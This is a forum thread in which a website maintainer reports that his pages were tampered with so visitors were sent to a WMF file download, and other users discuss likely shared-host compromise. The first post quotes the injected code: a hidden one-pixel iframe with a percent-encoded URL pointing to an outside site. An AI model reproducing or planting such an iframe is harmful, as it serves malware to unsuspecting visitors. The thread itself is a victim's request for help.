Is my website being hacked?

jimi_81

OSNN Senior Addict
Political User
#1
Ok, i went to check on a site I maintain, and the page did not display, instead i was routed to download a wmf file.

the two files that the page uses to launch.. index.html, and home.php had the following lines of code at the top of each file:

Code:
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
I didnt check the file last modified date... i just made the correction without thinking.

has anyone ever heard of this happening?
what happened!
 

melon

MS-DOS 2.0
Political User
#3
I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

Melon
 

jimi_81

OSNN Senior Addict
Political User
#4
some things i have been looking at in the logs...
under browser lists, i see something called Curl. Never heard of it.

I googled Curl... what does this mean:
curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, TFTP, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume, proxy tunneling and a busload of other useful tricks.
According to the stats page, only 1 user has curl, 1 hit registered. looks odd, thats why i bring it up.

the site is hosted on ipowerweb.com.. ive reported it to them.
The url the iframe points to is a shady looking site: trust4free.ws
 

jimi_81

OSNN Senior Addict
Political User
#6
i feel sick to my stomach.
ipowerweb seems to be the problem.

i wont be renewing with them thats for sure.
what a piss off.

thanks guys, reps
 

SPeedY_B

I may actually be insane.
#7
It could just be a vulnerable install of some web based software (awstats, phpBB, etc.) on the same server as your site.

Happened to me, site was blatantly de-faced though so it was spotted straight away.
 

Members online

No members online now.

Latest posts

Latest profile posts

Perris Calderon wrote on Electronic Punk's profile.
Ep, glad to see you come back and tidy up...did want to ask a one day favor, I want to enhance my resume , was hoping you could make me administrator for a day, if so, take me right off since I won't be here to do anything, and don't know the slightest about the board, but it would be nice putting "served administrator osnn", if can do, THANKS

Been running around Quora lately, luv it there https://tinyurl.com/ycpxl
Electronic Punk wrote on Perris Calderon's profile.
All good still mate?
Hello, is there anybody in there? Just nod if you can hear me ...
Xie
What a long strange trip it's been. =)

Forum statistics

Threads
61,970
Messages
673,297
Members
89,017
Latest member
Poseeut